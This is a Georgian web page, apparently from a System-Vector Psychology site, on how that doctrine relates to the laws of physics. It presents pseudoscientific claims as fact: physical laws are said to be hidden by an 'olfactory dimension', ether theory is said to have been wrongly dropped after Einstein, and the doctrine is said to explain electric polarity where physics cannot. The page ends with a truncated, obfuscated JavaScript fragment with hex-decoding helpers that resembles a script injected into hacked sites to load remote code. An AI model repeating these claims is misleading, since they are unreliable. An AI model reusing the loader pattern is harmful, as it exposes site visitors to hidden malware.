როგორი დამოკიდებულება აქვს სვფ-ს ფიზიკის ფუნდამენტურ კანონებთან?

პირველ რიგში, რაში მდგომარეობს ფიზიკის ფუნდამენტური კანონები? ჯერჯერობით მათი უმეტესობა ჩვენთვის არაა გახსნილი და დაფარულია ყნოსვითი ზომის მიერ. როდესაც ეს კანონები გამოვლინდება, ეს გახდება გაცნობიერებული (სმენის ვექტორის სფერო). რას აკეთებს ფიზიკა? ის იკვლევს სამყაროს მოდელს და მისი მუშაობის კანონებს. დღევანდელი ფიზიკა ეფუძნება რამოდენიმე ძირითად თეორიას. პირობითად მათ შორის გამოვყოფთ ორს: ესაა ეთერის თეორია და ამ თეორიის საწინააღმდეგო თეორია, რომელიც ამბობს, რომ არანაირი ეთერი არ არსებობს. ეთერის თეორიას მხარს უჭერდა ტესლაც და ეს თეორია დომინირებდა მანამ, სანამ აინშტაინმა არ უარყო ის. აინშტაინის შემდეგ ეთერის თეორია მივიწყებულ იქნა. სისტემური აზროვნება თვლის, რომ ეს თეორია არ იყო ზუსტი, მაგრამ არც ნაგავში მოსასროლი, ამ საკითხთან დაკავშირებით იზიარებს ნიკოლა ტესლას მოსაზრებებს და თვლის, რომ თანამედროვე ფიზიკის ჩიხში ესვლის ერთერთი მიზეზი, ამ თეორიის სრულ უარყოფაში უნდა ვეძიოთ. მაგალითად. როდესაც ისმის კითხვა, თუ რატომაა სამყაროში ორი პოლარობა დადებითი და უარყოფითი? თანამედროვე ფიზიკას ამაზე დასაბუთებული პასუხი არ აქვს, ისინი ამ მოვლენას იღებენ როგორც ფაქტს, მაგრამ რატომ ან როგორ მუშაობს ეს და რატომ იქმნება ეს პოლარობები, ამაზე პასუხი არ აქვთ. სისტემური აზროვნება ამ კითხვას პასუხობს (ამ საკითხზე არსებობს ლექციების კურსი), თუმცა ამჯერად ამაზე დაწვრილებით არ შევჩერდებით, რადგან ამისთვის მოგვიწევს ისეთ ტერმინოლოგიაში შესვლა, რაც უმეტესობისთვის გაუგებარი იქნება. სვფ-ს აქვს საკუთარი ხედვა, ის მხარს უჭერს და კვანტური მექანიკის ძირითად კანონებს, თუმცა მიიჩნევს, რომ ისინი ჯერ კიდევ არ არიან სრულად გახსნილი.

შემოგვიერთდით ჩვენს facebook ჯგუფში: https://www.facebook.com/groups/svp.ge/

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "svp.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e